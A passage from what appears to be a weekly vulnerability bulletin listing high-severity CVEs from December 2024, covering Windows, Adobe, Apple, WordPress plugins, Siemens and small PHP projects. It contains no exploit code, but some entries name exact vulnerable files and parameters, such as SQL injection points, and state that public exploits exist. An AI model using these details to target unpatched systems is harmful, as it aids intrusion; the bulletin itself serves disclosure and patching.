A vulnerability was found in code-projects Online Class and Exam Scheduling System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /pages/subject_update.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-12 | 8.8 | CVE-2024-12488 |
| fabian -- online_class_and_exam_scheduling_system |
A vulnerability was found in code-projects Online Class and Exam Scheduling System 1.0. It has been classified as critical. This affects an unknown part of the file /pages/term.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-12 | 8.8 | CVE-2024-12489 |
| anisha -- farmacia |
A vulnerability was found in code-projects Farmacia 1.0. It has been rated as critical. This issue affects some unknown processing of the file /visualizar-usuario.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-12 | 8.8 | CVE-2024-12492 |
| n/a -- n/a |
Windows IP Routing Management Snapin Remote Code Execution Vulnerability | 2024-12-12 | 8.8 | CVE-2024-49080 |
| n/a -- n/a |
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | 2024-12-12 | 8.8 | CVE-2024-49085 |
| n/a -- n/a |
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | 2024-12-12 | 8.8 | CVE-2024-49086 |
| n/a -- n/a |
Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability | 2024-12-12 | 8.8 | CVE-2024-49093 |
| n/a -- n/a |
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | 2024-12-12 | 8.8 | CVE-2024-49102 |
| n/a -- n/a |
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | 2024-12-12 | 8.8 | CVE-2024-49104 |
| n/a -- n/a |
Windows Hyper-V Remote Code Execution Vulnerability | 2024-12-12 | 8.8 | CVE-2024-49117 |
| n/a -- n/a |
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | 2024-12-12 | 8.8 | CVE-2024-49125 |
| apple -- macos |
A path handling issue was addressed with improved validation. This issue is fixed in macOS Sequoia 15.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. An app may be able to break out of its sandbox. | 2024-12-12 | 8.8 | CVE-2024-54498 |
| apple -- watchos |
A type confusion issue was addressed with improved memory handling. This issue is fixed in iPadOS 17.7.3, watchOS 11.2, visionOS 2.2, tvOS 18.2, macOS Sequoia 15.2, Safari 18.2, iOS 18.2 and iPadOS 18.2. Processing maliciously crafted web content may lead to memory corruption. | 2024-12-12 | 8.8 | CVE-2024-54505 |
| lopalopa -- e-learning_management_system |
A SQL Injection vulnerability was found in /search_class.php of kashipara E-learning Management System v1.0, which allows remote attackers to execute arbitrary SQL commands to get unauthorized database access via the school_year parameter. | 2024-12-09 | 8.8 | CVE-2024-54926 |
| n/a -- n/a |
The WPForms plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wpforms_is_admin_page' function in versions starting from 1.8.4 up to, and including, 1.9.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to refund payments and cancel subscriptions. | 2024-12-10 | 8.5 | CVE-2024-11205 |
| n/a -- n/a |
Microsoft/Muzic Remote Code Execution Vulnerability | 2024-12-12 | 8.4 | CVE-2024-49063 |
| n/a -- n/a |
Remote Desktop Client Remote Code Execution Vulnerability | 2024-12-12 | 8.4 | CVE-2024-49105 |
| n/a -- n/a |
Microsoft SharePoint Elevation of Privilege Vulnerability | 2024-12-12 | 8.2 | CVE-2024-49068 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 8.2 | CVE-2024-54036 |
| n/a -- n/a |
The OAuth Single Sign On - SSO (OAuth Client) plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 6.26.3. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username and the user does not have an already-existing account for the service returning the token. | 2024-12-12 | 8.1 | CVE-2024-10111 |
| n/a -- n/a |
The MainWP Child - Securely Connects to the MainWP Dashboard to Manage Multiple Sites plugin for WordPress is vulnerable to privilege escalation due to a missing authorization checks on the register_site function in all versions up to, and including, 5.2 when a site is left in an unconfigured state. This makes it possible for unauthenticated attackers to log in as an administrator on instances where MainWP Child is not yet connected to the MainWP Dashboard. IMPORTANT: this only affects sites who have MainWP Child installed and have not yet connected to the MainWP Dashboard, and do not have the unique security ID feature enabled. Sites already connected to the MainWP Dashboard plugin and do not have the unique security ID feature enabled, are NOT affected and not required to upgrade. Please note 5.2.1 contains a partial patch, though we consider 5.3 to be the complete patch. | 2024-12-13 | 8.1 | CVE-2024-10783 |
| n/a -- n/a |
The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.24.5. This is due to insufficient controls on the user role select field when utilizing the 'Role' field in a form. This makes it possible for unauthenticated attackers to create new administrative user accounts, even when the administrative user role has not been provided as an option to the user, granted that unauthenticated users have been provided access to the form. | 2024-12-14 | 8.1 | CVE-2024-11721 |
| n/a -- n/a |
The Print Science Designer plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.152 via deserialization of untrusted input through the 'designer-saved-projects' cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. | 2024-12-12 | 8.1 | CVE-2024-12312 |
| n/a -- n/a |
Microsoft Defender for Endpoint on Android Spoofing Vulnerability | 2024-12-12 | 8.1 | CVE-2024-49057 |
| n/a -- n/a |
Windows Remote Desktop Services Remote Code Execution Vulnerability | 2024-12-12 | 8.1 | CVE-2024-49106 |
| n/a -- n/a |
Windows Remote Desktop Services Remote Code Execution Vulnerability | 2024-12-12 | 8.1 | CVE-2024-49108 |
| n/a -- n/a |
Windows Remote Desktop Services Remote Code Execution Vulnerability | 2024-12-12 | 8.1 | CVE-2024-49115 |
| n/a -- n/a |
Windows Remote Desktop Services Remote Code Execution Vulnerability | 2024-12-12 | 8.1 | CVE-2024-49116 |
| n/a -- n/a |
Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability | 2024-12-12 | 8.1 | CVE-2024-49118 |
| n/a -- n/a |
Windows Remote Desktop Services Remote Code Execution Vulnerability | 2024-12-12 | 8.1 | CVE-2024-49119 |
| n/a -- n/a |
Windows Remote Desktop Services Remote Code Execution Vulnerability | 2024-12-12 | 8.1 | CVE-2024-49120 |
| n/a -- n/a |
Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability | 2024-12-12 | 8.1 | CVE-2024-49122 |
| n/a -- n/a |
Windows Remote Desktop Services Remote Code Execution Vulnerability | 2024-12-12 | 8.1 | CVE-2024-49123 |
| n/a -- n/a |
Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability | 2024-12-12 | 8.1 | CVE-2024-49124 |
| n/a -- n/a |
Windows Local Security Authority Subsystem Service (LSASS) Remote Code Execution Vulnerability | 2024-12-12 | 8.1 | CVE-2024-49126 |
| n/a -- n/a |
Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | 2024-12-12 | 8.1 | CVE-2024-49127 |
| n/a -- n/a |
Windows Remote Desktop Services Remote Code Execution Vulnerability | 2024-12-12 | 8.1 | CVE-2024-49128 |
| n/a -- n/a |
Windows Remote Desktop Services Remote Code Execution Vulnerability | 2024-12-12 | 8.1 | CVE-2024-49132 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2024-12-10 | 8 | CVE-2024-54034 |
| ivanti -- security_controls |
Under specific circumstances, insecure permissions in Ivanti Security Controls before version 2024.4.1 allows a local authenticated attacker to achieve local privilege escalation. | 2024-12-11 | 7.8 | CVE-2024-10251 |
| razormist -- phone_contact_manager_system |
A vulnerability, which was classified as problematic, has been found in SourceCodester Phone Contact Manager System 1.0. This issue affects the function UserInterface::MenuDisplayStart of the component User Menu. The manipulation of the argument name leads to improper input validation. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. | 2024-12-09 | 7.8 | CVE-2024-12353 |
| razormist -- phone_contact_manager_system |
A vulnerability, which was classified as critical, was found in SourceCodester Phone Contact Manager System 1.0. Affected is the function UserInterface::MenuDisplayStart of the component User Menu. The manipulation leads to buffer overflow. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. | 2024-12-09 | 7.8 | CVE-2024-12354 |
| razormist -- phone_contact_manager_system |
A vulnerability has been found in SourceCodester Phone Contact Manager System 1.0 and classified as problematic. Affected by this vulnerability is the function ContactBook::adding of the file ContactBook.cpp. The manipulation leads to improper input validation. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. | 2024-12-09 | 7.8 | CVE-2024-12355 |
| n/a -- n/a |
IBM Storage Scale GUI 5.1.9.0 through 5.1.9.6 and 5.2.0.0 through 5.2.1.1 contains a local privilege escalation vulnerability. A malicious actor with command line access to the 'scalemgmt' user can elevate privileges to gain root access to the host operating system. | 2024-12-14 | 7.8 | CVE-2024-31891 |
| n/a -- n/a |
Microsoft Office Elevation of Privilege Vulnerability | 2024-12-12 | 7.8 | CVE-2024-43600 |
| apple -- macos |
A logic issue was addressed with improved file handling. This issue is fixed in macOS Sequoia 15.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. A malicious app may be able to gain root privileges. | 2024-12-12 | 7.8 | CVE-2024-44291 |
| n/a -- n/a |
Animate versions 23.0.8, 24.0.5 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-45155 |
| n/a -- n/a |
Animate versions 23.0.8, 24.0.5 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-45156 |
| n/a -- n/a |
Microsoft Excel Remote Code Execution Vulnerability | 2024-12-12 | 7.8 | CVE-2024-49069 |
| n/a -- n/a |
Windows Task Scheduler Elevation of Privilege Vulnerability | 2024-12-12 | 7.8 | CVE-2024-49072 |
| n/a -- n/a |
Windows Kernel-Mode Driver Elevation of Privilege Vulnerability | 2024-12-12 | 7.8 | CVE-2024-49074 |
| n/a -- n/a |
Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability | 2024-12-12 | 7.8 | CVE-2024-49076 |
| n/a -- n/a |
Input Method Editor (IME) Remote Code Execution Vulnerability | 2024-12-12 | 7.8 | CVE-2024-49079 |
| n/a -- n/a |
Windows Common Log File System Driver Elevation of Privilege Vulnerability | 2024-12-12 | 7.8 | CVE-2024-49088 |
| n/a -- n/a |
Windows Common Log File System Driver Elevation of Privilege Vulnerability | 2024-12-12 | 7.8 | CVE-2024-49090 |
| n/a -- n/a |
Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | 2024-12-12 | 7.8 | CVE-2024-49114 |
| microsoft -- windows_server_2008 |
Windows Common Log File System Driver Elevation of Privilege Vulnerability | 2024-12-12 | 7.8 | CVE-2024-49138 |
| n/a -- n/a |
Microsoft Access Remote Code Execution Vulnerability | 2024-12-12 | 7.8 | CVE-2024-49142 |
| n/a -- n/a |
Not a product versions 21.0.0.5 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-49513 |
| n/a -- n/a |
After Effects versions 24.6.2, 25.0.1 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-49537 |
| n/a -- n/a |
Illustrator versions 29.0.0, 28.7.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-49538 |
| n/a -- n/a |
InDesign Desktop versions ID19.5, ID18.5.4 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-49543 |
| n/a -- n/a |
InDesign Desktop versions ID19.5, ID18.5.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-49544 |
| n/a -- n/a |
InDesign Desktop versions ID19.5, ID18.5.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-49545 |
| n/a -- n/a |
Media Encoder versions 25.0, 24.6.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-49551 |
| n/a -- n/a |
Media Encoder versions 25.0, 24.6.3 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-49552 |
| n/a -- n/a |
Media Encoder versions 25.0, 24.6.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-49553 |
| n/a -- n/a |
A vulnerability has been identified in SIMATIC S7-PLCSIM V16 (All versions), SIMATIC S7-PLCSIM V17 (All versions), SIMATIC STEP 7 Safety V16 (All versions), SIMATIC STEP 7 Safety V17 (All versions), SIMATIC STEP 7 Safety V18 (All versions), SIMATIC STEP 7 Safety V19 (All versions), SIMATIC STEP 7 V16 (All versions), SIMATIC STEP 7 V17 (All versions), SIMATIC STEP 7 V18 (All versions), SIMATIC STEP 7 V19 (All versions), SIMATIC WinCC Unified V16 (All versions), SIMATIC WinCC Unified V17 (All versions), SIMATIC WinCC Unified V18 (All versions), SIMATIC WinCC Unified V19 (All versions), SIMATIC WinCC V16 (All versions), SIMATIC WinCC V17 (All versions), SIMATIC WinCC V18 (All versions), SIMATIC WinCC V19 (All versions), SIMOCODE ES V16 (All versions), SIMOCODE ES V17 (All versions), SIMOCODE ES V18 (All versions), SIMOCODE ES V19 (All versions), SIMOTION SCOUT TIA V5.4 SP1 (All versions), SIMOTION SCOUT TIA V5.4 SP3 (All versions), SIMOTION SCOUT TIA V5.5 SP1 (All versions), SIMOTION SCOUT TIA V5.6 SP1 (All versions), SINAMICS Startdrive V16 (All versions), SINAMICS Startdrive V17 (All versions), SINAMICS Startdrive V18 (All versions), SINAMICS Startdrive V19 (All versions), SIRIUS Safety ES V17 (TIA Portal) (All versions), SIRIUS Safety ES V18 (TIA Portal) (All versions), SIRIUS Safety ES V19 (TIA Portal) (All versions), SIRIUS Soft Starter ES V17 (TIA Portal) (All versions), SIRIUS Soft Starter ES V18 (TIA Portal) (All versions), SIRIUS Soft Starter ES V19 (TIA Portal) (All versions), TIA Portal Cloud V16 (All versions), TIA Portal Cloud V17 (All versions), TIA Portal Cloud V18 (All versions), TIA Portal Cloud V19 (All versions). Affected products do not properly sanitize user-controllable input when parsing log files. This could allow an attacker to cause a type confusion and execute arbitrary code within the affected application. | 2024-12-10 | 7.8 | CVE-2024-49849 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-52831 |
| n/a -- n/a |
Animate versions 23.0.8, 24.0.5 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-52982 |
| n/a -- n/a |
Animate versions 23.0.8, 24.0.5 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-52983 |
| n/a -- n/a |
Animate versions 23.0.8, 24.0.5 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-52984 |
| n/a -- n/a |
Animate versions 23.0.8, 24.0.5 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-52985 |
| n/a -- n/a |
Animate versions 23.0.8, 24.0.5 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-52986 |
| n/a -- n/a |
Animate versions 23.0.8, 24.0.5 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-52987 |
| n/a -- n/a |
Animate versions 23.0.8, 24.0.5 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-52988 |
| n/a -- n/a |
Animate versions 23.0.8, 24.0.5 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-52989 |
| n/a -- n/a |
Animate versions 23.0.8, 24.0.5 and earlier are affected by a Buffer Underwrite ('Buffer Underflow') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could leverage this vulnerability to manipulate memory in such a way that they could execute code under the privileges of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-52990 |
| n/a -- n/a |
Substance3D - Sampler versions 4.5.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-52994 |
| n/a -- n/a |
Substance3D - Sampler versions 4.5.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-52995 |
| n/a -- n/a |
Substance3D - Sampler versions 4.5.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-52996 |
| n/a -- n/a |
Photoshop Desktop versions 26.0 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-52997 |
| adobe -- substance_3d_modeler |
Substance3D - Modeler versions 1.14.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-52999 |
| adobe -- substance_3d_modeler |
Substance3D - Modeler versions 1.14.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-53000 |
| adobe -- substance_3d_modeler |
Substance3D - Modeler versions 1.14.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-53001 |
| adobe -- substance_3d_modeler |
Substance3D - Modeler versions 1.14.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-53002 |
| adobe -- substance_3d_modeler |
Substance3D - Modeler versions 1.14.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-53003 |
| n/a -- n/a |
A vulnerability has been identified in Teamcenter Visualization V14.2 (All versions < V14.2.0.14), Teamcenter Visualization V14.3 (All versions < V14.3.0.12), Teamcenter Visualization V2312 (All versions < V2312.0008), Tecnomatix Plant Simulation V2302 (All versions < V2302.0016), Tecnomatix Plant Simulation V2404 (All versions < V2404.0005). The affected applications contain a stack based overflow vulnerability while parsing specially crafted WRL files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-25000) | 2024-12-10 | 7.8 | CVE-2024-53041 |
| n/a -- n/a |
A vulnerability has been identified in Teamcenter Visualization V14.2 (All versions < V14.2.0.14), Teamcenter Visualization V14.3 (All versions < V14.3.0.12), Teamcenter Visualization V2312 (All versions < V2312.0008), Tecnomatix Plant Simulation V2302 (All versions < V2302.0016), Tecnomatix Plant Simulation V2404 (All versions < V2404.0005). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted WRL files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-25206) | 2024-12-10 | 7.8 | CVE-2024-53242 |
| n/a -- n/a |
Animate versions 23.0.8, 24.0.5 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-53953 |
| n/a -- n/a |
Animate versions 23.0.8, 24.0.5 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-53954 |
| adobe -- bridge |
Bridge versions 14.1.3, 15.0 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-53955 |
| adobe -- premiere_pro |
Premiere Pro versions 25.0, 24.6.3 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-53956 |
| adobe -- substance_3d_painter |
Substance3D - Painter versions 10.1.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-53957 |
| adobe -- substance_3d_painter |
Substance3D - Painter versions 10.1.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-53958 |
| adobe -- framemaker |
Adobe Framemaker versions 2020.7, 2022.5 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7.8 | CVE-2024-53959 |
| n/a -- n/a |
A vulnerability has been identified in Solid Edge SE2024 (All versions < V224.0 Update 5). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted ASM files. This could allow an attacker to execute code in the context of the current process. | 2024-12-10 | 7.8 | CVE-2024-54093 |
| n/a -- n/a |
A vulnerability has been identified in Solid Edge SE2024 (All versions < V224.0 Update 5). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process. | 2024-12-10 | 7.8 | CVE-2024-54094 |
| n/a -- n/a |
A vulnerability has been identified in Solid Edge SE2024 (All versions < V224.0 Update 10). The affected application is vulnerable to integer underflow vulnerability which can be triggered while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process. | 2024-12-10 | 7.8 | CVE-2024-54095 |
| apple -- macos |
A path handling issue was addressed with improved validation. This issue is fixed in macOS Sequoia 15.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. Running a mount command may unexpectedly execute arbitrary code. | 2024-12-12 | 7.8 | CVE-2024-54489 |
| apple -- macos |
A logic issue was addressed with improved restrictions. This issue is fixed in macOS Sequoia 15.2. A malicious app may be able to gain root privileges. | 2024-12-12 | 7.8 | CVE-2024-54515 |
| ivanti -- workspace_control |
Under specific circumstances, insecure permissions in Ivanti Workspace Control before version 10.18.40.0 allows a local authenticated attacker to achieve local privilege escalation. | 2024-12-11 | 7.8 | CVE-2024-8496 |
| ivanti -- automation |
Under specific circumstances, insecure permissions in Ivanti Automation before version 2024.4.0.1 allows a local authenticated attacker to achieve local privilege escalation. | 2024-12-11 | 7.8 | CVE-2024-9845 |
| n/a -- n/a |
The Best WordPress Gallery Plugin - FooGallery plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.4.26. This makes it possible for authenticated attackers, with contributor level or higher to read the contents of arbitrary folders on the server, which can contain sensitive information such as folder structure. | 2024-12-10 | 7.7 | CVE-2023-6947 |
| n/a -- n/a |
The WP Job Portal - A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'resumeid' parameter in all versions up to, and including, 2.2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-14 | 7.5 | CVE-2024-11711 |
| n/a -- n/a |
The WP Courses LMS - Online Courses Builder, eLearning Courses, Courses Solution, Education Courses plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wpc_update_user_meta_option() function in all versions up to, and including, 3.2.21. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary user's metadata which can be levereged to block an administrator from accessing their site when wp_capabilities is set to 0. | 2024-12-12 | 7.5 | CVE-2024-12172 |
| n/a -- n/a |
IBM Storage Scale GUI 5.1.9.0 through 5.1.9.6 and 5.2.0.0 through 5.2.1.1 could allow a user to perform unauthorized actions after intercepting and modifying a csv file due to improper neutralization of formula elements. | 2024-12-14 | 7.5 | CVE-2024-31892 |
| n/a -- n/a |
A flaw was found in Undertow. An HTTP request header value from a previous stream may be incorrectly reused for a request associated with a subsequent stream on the same HTTP/2 connection. This issue can potentially lead to information leakage between requests. | 2024-12-12 | 7.5 | CVE-2024-4109 |
| gstreamer_project -- gstreamer |
GStreamer is a library for constructing graphs of media-handling components. An OOB-write vulnerability has been identified in the gst_ssa_parse_remove_override_codes function of the gstssaparse.c file. This function is responsible for parsing and removing SSA (SubStation Alpha) style override codes, which are enclosed in curly brackets ({}). The issue arises when a closing curly bracket "}" appears before an opening curly bracket "{" in the input string. In this case, memmove() incorrectly duplicates a substring. With each successive loop iteration, the size passed to memmove() becomes progressively larger (strlen(end+1)), leading to a write beyond the allocated memory bounds. This vulnerability is fixed in 1.24.10. | 2024-12-12 | 7.5 | CVE-2024-47541 |
| gstreamer_project -- gstreamer |
GStreamer is a library for constructing graphs of media-handling components. A null pointer dereference has been discovered in the id3v2_read_synch_uint function, located in id3v2.c. If id3v2_read_synch_uint is called with a null work->hdr.frame_data, the pointer guint8 *data is accessed without validation, resulting in a null pointer dereference. This vulnerability can result in a Denial of Service (DoS) by triggering a segmentation fault (SEGV). This vulnerability is fixed in 1.24.10. | 2024-12-12 | 7.5 | CVE-2024-47542 |
| n/a -- n/a |
Windows Remote Desktop Services Denial of Service Vulnerability | 2024-12-12 | 7.5 | CVE-2024-49075 |
| n/a -- n/a |
Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability | 2024-12-12 | 7.5 | CVE-2024-49096 |
| n/a -- n/a |
Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability | 2024-12-12 | 7.5 | CVE-2024-49113 |
| n/a -- n/a |
Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability | 2024-12-12 | 7.5 | CVE-2024-49121 |
| n/a -- n/a |
Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability | 2024-12-12 | 7.5 | CVE-2024-49129 |
| huawei -- harmonyos |
Vulnerability of improper access control in the album module Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2024-12-12 | 7.5 | CVE-2024-54103 |
| huawei -- harmonyos |
Cross-process screen stack vulnerability in the UIExtension module Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2024-12-12 | 7.5 | CVE-2024-54104 |
| huawei -- harmonyos |
Read/Write vulnerability in the image decoding module Impact: Successful exploitation of this vulnerability will affect availability. | 2024-12-12 | 7.5 | CVE-2024-54105 |
| huawei -- harmonyos |
Null pointer dereference vulnerability in the image decoding module Impact: Successful exploitation of this vulnerability will affect availability. | 2024-12-12 | 7.5 | CVE-2024-54106 |
| huawei -- harmonyos |
